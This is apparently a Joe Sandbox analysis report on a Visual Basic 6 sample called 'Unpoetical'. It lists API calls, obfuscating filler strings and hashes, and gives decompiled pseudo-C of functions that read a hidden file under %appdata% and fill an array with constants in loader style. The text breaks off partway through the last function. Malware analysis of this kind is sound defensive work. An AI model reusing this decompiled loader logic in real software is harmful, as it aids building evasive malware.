      0x0041fbbb
      0x0041fbc1
      0x0041fbc6
      0x0041fbcb
      0x0041fbd5
      0x0041fbd5
      0x0041fbda
      0x0041fbe1
      0x0041fbe8
      0x0041fbeb
      0x0041fbec
      0x0041fbf1
      0x0041fbf8
      0x0041fc08
      0x0041fc0f
      0x0041fc10
      0x0041fc15
      0x0041fc1a
      0x0041fc22
      0x0041fc23
      0x0041fc2b
      0x0041fc2f
      0x0041fc30
      0x0041fc35
      0x0041fc3d
      0x0041fc3e
      0x0041fc41
      0x0041fc42
      0x0041fc47
      0x0041fc48
      0x0041fc4d
      0x0041fc53
      0x0041fc60
      0x0041fc61
      0x0041fc67
      0x0041fc68
      0x0041fc6d
      0x0041fc77
      0x0041fc82
      0x0041fc86
      0x0041fc8d
      0x0041fc94
      0x0041fc98
      0x0041fc9c
      0x0041fc9d
      0x0041fc9f
      0x0041fca4
      0x0041fcb0
      0x0041fcb6
      0x0041fcc0
      0x0041fcd3
      0x0041fcd8
      0x0041fce0
      0x0041fce4
      0x0041fce5
      0x0041fcea
      0x0041fcf1
      0x0041fcfb
      0x0041fcfc
      0x0041fd01
      0x0041fd02
      0x0041fd05
      0x0041fd06
      0x0041fd0b
      0x0041fd0c
      0x0041fd16
      0x0041fd1e
      0x0041fd26
      0x0041fd2a
      0x0041fd2e
      0x0041fd2f
      0x0041fd31
      0x0041fd36
      0x0041fd40
      0x0041fd5d
      0x0041fd42
      0x0041fd42
      0x0041fd47
      0x0041fd4c
      0x0041fd51
      0x0041fd51
      0x0041fd6f
      0x0041fd87
      0x0041fd8a
      0x0041fd8c
      0x0041fd99
      0x0041fdbb
      0x0041fd9b
      0x0041fd9b
      0x0041fd9d
      0x0041fda2
      0x0041fda8
      0x0041fdae
      0x0041fdb3
      0x0041fdb3
      0x0041fdc5
      0x0041fde0
      0x0041fde6
      0x0041fde8
      0x0041fdf5
      0x0041fe1a
      0x0041fdf7
      0x0041fdf7
      0x0041fdfc
      0x0041fe01
      0x0041fe07
      0x0041fe0d
      0x0041fe12
      0x0041fe12
      0x0041fe28
      0x0041fe2f
      0x0041fe2f
      0x0041fe34
      0x0041fe3b
      0x0041fe42
      0x0041fe45
      0x0041fe46
      0x0041fe48
      0x0041fe4d
      0x0041fe52
      0x0041fe55
      0x0041fe5f
      0x0041fe60
      0x0041fe68
      0x0041fe69
      0x0041fe6c
      0x0041fe6d
      0x0041fe72
      0x0041fe7c
      0x0041fe80
      0x0041fe84
      0x0041fe85
      0x0041fe87
      0x0041fe8f
      0x0041fe98
      0x0041fe9e
      0x0041fea3
      0x0041fead
      0x0041feb2
      0x0041feb3
      0x0041febb
      0x0041fec1
      0x0041fec6
      0x0041fecb
      0x0041fed3
      0x0041fed7
      0x0041fedf
      0x0041fee0
      0x0041fee8
      0x0041fee9
      0x0041feec
      0x0041feed
      0x0041fef2
      0x0041fef3
      0x0041fefa
      0x0041ff00
      0x0041ff07
      0x0041ff0f
      0x0041ff16
      0x0041ff1d
      0x0041ff25
      0x0041ff2c
      0x0041ff34
      0x0041ff3b
      0x0041ff43
      0x0041ff4a
      0x0041ff50
      0x0041ff57
      0x0041ff5e
      0x0041ff60
      0x0041ff62
      0x0041ff64
      0x0041ff66
      0x0041ff69
      0x0041ff6a
      0x0041ff74
      0x0041ff79
      0x0041ff7a
      0x0041ff81
      0x0041ff88
      0x0041ff8f
      0x0041ff97
      0x0041ff9e
      0x0041ffa5
      0x0041ffad
      0x0041ffb4
      0x0041ffbc
      0x0041ffc3
      0x0041ffcb
      0x0041ffd2
      0x0041ffda
      0x0041ffdb
      0x0041ffe1
      0x0041ffe7
      0x0041ffec
      0x0041fff3
      0x0041fffa
      0x00420000
      0x00420007
      0x0042000f
      0x00420016
      0x0042001c
      0x00420023
      0x0042002a
      0x0042002d
      0x0042002e
      0x00420035
      0x0042003c
      0x00420043
      0x0042004a
      0x00420051
      0x00420059
      0x00420060
      0x00420066
      0x0042006d
      0x00420074
      0x00420077
      0x00420078
      0x0042007f
      0x00420086
      0x0042008d
      0x00420094
      0x0042009b
      0x004200a1
      0x004200a8
      0x004200af
      0x004200b4
      0x004200b7
      0x004200b8
      0x004200c2
      0x004200c7
      0x004200c8
      0x004200d2
      0x004200da
      0x004200e2
      0x004200e2
      0x004200e7
      0x004200e8
      0x00420135
      0x0042013d
      0x00420145
      0x0042014d
      0x00420153
      0x00420159
      0x0042015a
      0x0042015c
      0x00420164
      0x00420169

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041FB5E
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FB88
      • __vbaAryConstruct2.MSVBVM60(?,00403000,00000002,?,?,?,?,00401546), ref: 0041FB98
      • #593.MSVBVM60(0000000A), ref: 0041FBB6
      • __vbaFreeVar.MSVBVM60(0000000A), ref: 0041FBC1
      • #537.MSVBVM60(000000D4,0000000A), ref: 0041FBCB
      • __vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 0041FBD5
      • #648.MSVBVM60(0000000A), ref: 0041FBEC
      • #652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 0041FC10
      • #692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FC23
      • #522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FC30
      • __vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FC42
      • #514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 0041FC48
      • __vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FC68
      • __vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 0041FC77
      • __vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0041FC9F
      • __vbaVarDup.MSVBVM60 ref: 0041FCD3
      • #513.MSVBVM60(?,?,000000A2), ref: 0041FCE5
      • __vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 0041FD06
      • #628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FD0C
      • __vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FD16
      • __vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FD1E
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0041FD31
      • __vbaNew2.MSVBVM60(004025A8,004223C0,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FD4C
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 0041FDAE
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,000000C0), ref: 0041FE0D
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,000000C0), ref: 0041FE2F
      • #628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 0041FE4D
      • #670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE60
      • __vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE6D
      • __vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 0041FE87
      • #525.MSVBVM60(000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FEA3
      • __vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FEAD
      • #696.MSVBVM60(00000000,000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FEB3
      • __vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FEC1
      • #696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FECB
      • #541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0041FEE0
      • __vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002), ref: 0041FEED
      • #696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002), ref: 0041FEF3
      • __vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002), ref: 0041FF07
      • __vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00403000,00000002), ref: 0041FF0F
      • #702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF6A
      • __vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF74
      • #696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF7A
      • __vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF8F
      • __vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FF97
      • #696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041FFEC
      • #648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042002E
      • __vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420043
      • #648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420078
      • __vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042008D
      • #651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200B8
      • __vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200C2
      • __vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200C8
      • __vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200D2
      • __vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200DA
      • __vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004200E2
      • __vbaFreeStr.MSVBVM60(0042016A,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 00420135
      • __vbaFreeStr.MSVBVM60(0042016A,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0042013D
      • __vbaFreeStr.MSVBVM60(0042016A,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 00420145
      • __vbaAryDestruct.MSVBVM60(00000000,?,0042016A,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 0042015C
      • __vbaFreeStr.MSVBVM60(00000000,?,0042016A,?,?,?,?,00403000,00000002,?,?,?,?,00401546), ref: 00420164
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
      • String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
      • API String ID: 2160480785-2797486545
      • Opcode ID: 8c178960e0041a308fb79e7ea60fd7f995e43b1332b6ba236a585c6aab6788fd
      • Instruction ID: aa2f0e252efbee6df21fe4b3bd8febeb41a801fe0cdd427eac5805d0528cbe4f
      • Opcode Fuzzy Hash: 8c178960e0041a308fb79e7ea60fd7f995e43b1332b6ba236a585c6aab6788fd
      • Instruction Fuzzy Hash: B8026E71940218ABDB15EBA0CC96FEDB7B9BF04304F10816FE105BB1E2EB789A45CB54
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041D90C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 48%
      			E0041D90C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v80;
				char _v96;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				short _t78;
				signed int _t79;
				char* _t83;
				char* _t88;
				signed int _t99;
				signed int _t104;
				intOrPtr _t132;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t132;
				L00401540();
				_v12 = _t132;
				_v8 = 0x401270;
				_push(L"Scopiformly9");
				_push(L"baadene");
				_push( &_v64); // executed
				L00401732(); // executed
				_v104 = L"Ambulancesagen2";
				_v112 = 0x8008;
				_push( &_v64);
				_t78 =  &_v112;
				_push(_t78);
				L00401738();
				_v152 = _t78;
				L00401828();
				_t79 = _v152;
				if(_t79 != 0) {
					_push(0x1b);
					_push(L"Reklamekampagne4");
					L00401750();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v172 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v172 = 0x4223c0;
					}
					_v152 =  *_v172;
					_t99 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v48);
					asm("fclex");
					_v156 = _t99;
					if(_v156 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v152);
						_push(_v156);
						L004017C8();
						_v176 = _t99;
					}
					_v160 = _v48;
					_t104 =  *((intOrPtr*)( *_v160 + 0x118))(_v160,  &_v148);
					asm("fclex");
					_v164 = _t104;
					if(_v164 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x118);
						_push(0x4025b8);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v180 = _t104;
					}
					_t79 = _v148;
					_v40 = _t79;
					L004017C2();
				}
				L004017B6();
				_push(0x44);
				_push(_v36);
				L00401750();
				L0040183A();
				_push(_t79);
				_push(L"Jordfstedes4");
				L0040172C();
				asm("sbb eax, eax");
				_v152 =  ~( ~( ~_t79));
				L00401846();
				_t83 = _v152;
				if(_t83 != 0) {
					_v104 = L"appdata";
					_v112 = 8;
					L0040184C();
					_push( &_v64);
					_push( &_v80);
					L0040171A();
					_v120 = L"\\XvFu5flZcgudIlwvVLtjOx372";
					_v128 = 8;
					_push( &_v80);
					_push( &_v128);
					_t88 =  &_v96;
					_push(_t88);
					L00401720();
					_push(_t88);
					L00401834();
					L0040183A();
					_push(_t88);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L00401726();
					L00401846();
					_push( &_v96);
					_push( &_v80);
					_push( &_v64);
					_push(3);
					L00401840();
					_push(1);
					_push( &_v32);
					_push(0);
					L00401714();
					_push(1);
					L0040170E();
					_push(0xec);
					_push( &_v64);
					L00401708();
					_t83 =  &_v64;
					_push(_t83);
					L00401834();
					L0040183A();
					L00401828();
				}
				_push(0x41dbf8);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t83;
			}


































      0x0041d911
      0x0041d91c
      0x0041d91d
      0x0041d929
      0x0041d931
      0x0041d934
      0x0041d93b
      0x0041d940
      0x0041d948
      0x0041d949
      0x0041d94e
      0x0041d955
      0x0041d95f
      0x0041d960
      0x0041d963
      0x0041d964
      0x0041d969
      0x0041d973
      0x0041d978
      0x0041d981
      0x0041d987
      0x0041d989
      0x0041d98e
      0x0041d998
      0x0041d9a4
      0x0041d9c1
      0x0041d9a6
      0x0041d9a6
      0x0041d9ab
      0x0041d9b0
      0x0041d9b5
      0x0041d9b5
      0x0041d9d3
      0x0041d9eb
      0x0041d9ee
      0x0041d9f0
      0x0041d9fd
      0x0041da1f
      0x0041d9ff
      0x0041d9ff
      0x0041da01
      0x0041da06
      0x0041da0c
      0x0041da12
      0x0041da17
      0x0041da17
      0x0041da29
      0x0041da44
      0x0041da4a
      0x0041da4c
      0x0041da59
      0x0041da7e
      0x0041da5b
      0x0041da5b
      0x0041da60
      0x0041da65
      0x0041da6b
      0x0041da71
      0x0041da76
      0x0041da76
      0x0041da85
      0x0041da8c
      0x0041da93
      0x0041da93
      0x0041daa0
      0x0041daa5
      0x0041daa7
      0x0041daaa
      0x0041dab4
      0x0041dab9
      0x0041daba
      0x0041dabf
      0x0041dac6
      0x0041dacc
      0x0041dad6
      0x0041dadb
      0x0041dae4
      0x0041daea
      0x0041daf1
      0x0041dafe
      0x0041db06
      0x0041db0a
      0x0041db0b
      0x0041db10
      0x0041db17
      0x0041db21
      0x0041db25
      0x0041db26
      0x0041db29
      0x0041db2a
      0x0041db2f
      0x0041db30
      0x0041db3a
      0x0041db3f
      0x0041db40
      0x0041db42
      0x0041db44
      0x0041db49
      0x0041db51
      0x0041db59
      0x0041db5d
      0x0041db61
      0x0041db62
      0x0041db64
      0x0041db6c
      0x0041db71
      0x0041db72
      0x0041db74
      0x0041db79
      0x0041db7b
      0x0041db80
      0x0041db88
      0x0041db89
      0x0041db8e
      0x0041db91
      0x0041db92
      0x0041db9c
      0x0041dba4
      0x0041dba4
      0x0041dba9
      0x0041dbda
      0x0041dbe2
      0x0041dbea
      0x0041dbf2
      0x0041dbf7

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041D929
      • #692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041D949
      • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041D964
      • __vbaFreeVar.MSVBVM60(00008008,?), ref: 0041D973
      • #618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D98E
      • __vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041D998
      • __vbaNew2.MSVBVM60(004025A8,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041D9B0
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DA12
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DA71
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DA93
      • __vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DAA0
      • #618.MSVBVM60(?,00000044,00008008,?), ref: 0041DAAA
      • __vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DAB4
      • __vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DABF
      • __vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAD6
      • __vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DAFE
      • #666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB0B
      • __vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB2A
      • __vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB30
      • __vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB3A
      • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB49
      • __vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DB51
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DB64
      • __vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DB74
      • __vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DB7B
      • #526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DB89
      • __vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB92
      • __vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DB9C
      • __vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041DBA4
      • __vbaFreeStr.MSVBVM60(0041DBF8,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DBDA
      • __vbaFreeStr.MSVBVM60(0041DBF8,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DBE2
      • __vbaFreeStr.MSVBVM60(0041DBF8,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DBEA
      • __vbaFreeStr.MSVBVM60(0041DBF8,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DBF2
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
      • String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
      • API String ID: 3805544571-2284846736
      • Opcode ID: dcd3c25e1994c7bb48c9cc546b3b88f66393fc48b29d92de4d3f93aa9404ef10
      • Instruction ID: 88d23f3c1a5ebc9e82e2064acc66740f0568a26c90df8af299924a4c619d7710
      • Opcode Fuzzy Hash: dcd3c25e1994c7bb48c9cc546b3b88f66393fc48b29d92de4d3f93aa9404ef10
      • Instruction Fuzzy Hash: C9713B71E00218AADB14EBA1CC46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 004202F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON
      Download Yara Rule

      Control-flow Graph

      C-Code - Quality: 60%
      			E004202F4(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v40;
				signed int _v44;
				char _v48;
				void* _v52;
				char _v56;
				void* _v60;
				intOrPtr _v68;
				char _v76;
				char _v92;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v132;
				intOrPtr _v140;
				char* _v148;
				char _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _t182;
				signed int _t207;
				char* _t208;
				signed int _t219;
				char* _t221;
				signed int _t223;
				signed int _t229;
				void* _t231;
				signed int _t234;
				char* _t239;
				void* _t246;
				void* _t248;
				void* _t250;
				void* _t252;
				void* _t254;
				void* _t259;
				void* _t261;
				void* _t263;
				void* _t273;
				void* _t282;
				void* _t284;
				intOrPtr _t285;
				void* _t286;

				_t285 = _t284 - 0x18;
				 *[fs:0x0] = _t285;
				L00401540();
				_v28 = _t285;
				_v24 = 0x4013f0;
				_v20 = 0;
				_v16 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401546, _t282);
				_v8 = 1;
				_v8 = 2;
				_v68 = 0x4fdf6b;
				_v76 = 3;
				_push( &_v76);
				_push( &_v92);
				L0040160C();
				_push( &_v92);
				_push( &_v108);
				L004016BA();
				_v148 = L"FOSTERET";
				_v156 = 0x8008;
				_push( &_v108);
				_t182 =  &_v156;
				_push(_t182);
				L004016AE();
				_v160 = _t182;
				_push( &_v108);
				_push( &_v92);
				_push( &_v76);
				_push(3);
				L00401840();
				_t286 = _t285 + 0x10;
				if(_v160 != 0) {
					_v8 = 3;
					if( *0x4223c0 != 0) {
						_v196 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v196 = 0x4223c0;
					}
					_v160 =  *_v196;
					_t229 =  *((intOrPtr*)( *_v160 + 0x14))(_v160,  &_v60);
					asm("fclex");
					_v164 = _t229;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v160);
						_push(_v164);
						L004017C8();
						_v200 = _t229;
					}
					_v168 = _v60;
					_v132 = 0x80020004;
					_v140 = 0xa;
					_t231 = 0x10;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					L004016B4();
					L0040183A();
					_t234 =  *((intOrPtr*)( *_v168 + 0x13c))(_v168, _t231, 0x5e4c2e);
					asm("fclex");
					_v172 = _t234;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025b8);
						_push(_v168);
						_push(_v172);
						L004017C8();
						_v204 = _t234;
					}
					L00401846();
					L004017C2();
					_v8 = 4;
					_v68 = 0x16;
					_v76 = 2;
					_push( &_v76);
					_push( &_v92);
					L00401606();
					_v100 = 0xb8;
					_v108 = 2;
					_push( &_v108);
					_push(0xa1);
					_push( &_v92);
					_t239 =  &_v56;
					_push(_t239);
					L00401858();
					_push(_t239);
					L004016A2();
					L0040183A();
					L00401846();
					_push( &_v108);
					_push( &_v92);
					_push( &_v76);
					_push(3);
					L00401840();
					_t286 = _t286 + 0x10;
				}
				_v8 = 6;
				_push(0);
				_push(9);
				_push(1);
				_push(3);
				_push( &_v48);
				_push(4);
				_push(0x80);
				L00401600();
				_v8 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (0 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x27c30;
				_v8 = 8;
				_t246 = 1;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t246 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x94a0c;
				_v8 = 9;
				_t248 = 2;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t248 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2164a4;
				_v8 = 0xa;
				_t250 = 3;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t250 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5d9b94;
				_v8 = 0xb;
				_t252 = 4;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t252 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x5a7363;
				_v8 = 0xc;
				_t254 = 5;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t254 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x2787b7;
				_v8 = 0xd;
				_v68 =  *0x40146c;
				_v76 = 4;
				_push( &_v92);
				_t207 =  &_v76;
				_push(_t207);
				L004017A4();
				_v160 = _t207;
				if(_v160 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(_v160);
					L0040179E();
					_v208 = _t207;
				}
				_t208 =  &_v92;
				_push(_t208);
				L0040178C();
				_t273 = 6;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t273 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = _t208;
				_push( &_v92);
				_push( &_v76);
				_push(2);
				L00401840();
				_v8 = 0xe;
				_t259 = 7;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t259 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x37e4a9;
				_v8 = 0xf;
				_t261 = 8;
				 *((intOrPtr*)( *(_v48 + 0xc) + (_t261 -  *((intOrPtr*)(_v48 + 0x14))) * 4)) = 0x84c244;
				_v8 = 0x10;
				_t263 = 9;
				_t219 =  *(_v48 + 0xc);
